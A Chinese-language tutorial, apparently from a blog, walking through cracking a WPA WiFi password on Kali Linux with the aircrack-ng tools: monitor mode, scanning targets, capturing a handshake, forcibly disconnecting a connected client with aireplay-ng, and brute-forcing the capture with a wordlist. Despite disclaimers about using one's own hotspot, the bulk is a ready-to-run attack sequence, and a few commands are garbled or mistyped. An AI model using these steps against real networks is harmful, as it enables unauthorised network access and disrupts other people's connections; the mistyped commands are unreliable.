注意：私自破解他人WiFi属于违法行为，我这里使用自己的WiFi热点作为学习和测试。明白了破解原理就知道应该怎么防范了。

前期准备

（注意啊：此教程是使用的kali2022的版本制作，教程是参考，方法都一样）

kali linux 操作系统，我使用的是装在虚拟机中的kali linux

支持监听模式的无线网卡，我这里使用的是USB无线网卡RT8812AU网卡

字典文件，我这里使用的是kali 默认的字典文件

所谓暴力破解就是穷举法，将密码字典中每一个密码依次去与握手包中的密码进行匹配，直到匹配成功。所以能否成功破解wifi密码取决于密码字典本身是否包含了这个密码。破解的时间取决于CPU的运算速度以及密码本身的复杂程度。如果WiFi密码设得足够复杂，即使有一个好的密码字典，要想破解成功花上个几天几十天甚至更久都是有可能滴。

开始教程

1.首先我们先连接网卡，并且打开终端执行

sudo su一键复制

2.使用airmon-ng命令检查网卡是否支持监听模式（本教程制作使用的网卡是RT8812au，如果您只需显示的是其他的网卡也不要慌，其他的网卡也是支持的，不一定要RT8812au才行啊）

airmon-ng一键复制

小白注意啊：上面的Driver：对应的88XXau这个是驱动，不是网卡的芯片是88XXau啊

从图中可以看到我的无线网卡wlan0是支持监听模式的。如果该命令没有任何输出则表示没有可以支持监听模式的网卡。

3.开启无线网卡的监听模式

airmon-ng start wlan0一键复制

4.开启监听模式之后，有的无线接口wlan0变成了wlan0mon，可以使用ifconfig命令查看 ,我这里没有变，但是监听模式也是开启了（注意啊：如果变成wlan0mon后面命令请把wlan0改成wlan0mon）

5.扫描环境中的WiFi网络

airodump-ng wlan0一键复制

使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息，包括信号强度，加密类型，信道等。这里我们记下要破解WiFi的BSSID和信道，如图中我用红色标记出来的。当搜索到我们想要破解的WiFi热点时可以 Ctrl+C 停止搜索。

6.抓取握手包
使用网卡的监听模式抓取周围的无线网络数据包，其中我们需要用到的数据包是包含了WiFi密码的握手包，当有新用户连接WiFi时会发送握手包。
抓包：

airodump-ng -c 1 --bssid B0:45:02:D2:B7:14 -w shaoyu wlan0一键复制

或者

airodump-ng -w shaoyu-c 1 --bssid B0:45:02:D2:B7:14 wlan0 -ignore-nefative-oneaa一键复制

参数解释：

-c 指定信道，上面已经标记目标热点的信道

-bssid指定目标路由器的BSSID，就是上面标记的BSSID

-w指定抓取的数据包保存的目录

回车后，如下界面

没有出现就等会

从这个界面可以看出，选定的wifi一共有3个设备连接，没有设备连接的wifi是无法破解的

7.新开一个终端把对方踢下线，这样就会抓包成功

aireplay-ng -0 10 -a B0:45:02:D2:B7:14 -c 7C:D6:61:85:FD:BF wlan0一键复制

8.抓包成功 如下图所示：

9.进行破解WIFI密码（跑包）

aircrack-ng  -a2 -b B0:45:02:D2:B7:14 -w pass.txt shaoyu-01.cap

-b 路由器mac
-w 密码字典 抓包资源一键复制

或者

ircrack-ng -w pass.txt shaoyu-*.ivs一键复制

这是再跑了

成功截图

温馨提示

kali学的好，牢饭少不了

本教程仅用于学习，请大家谨慎使用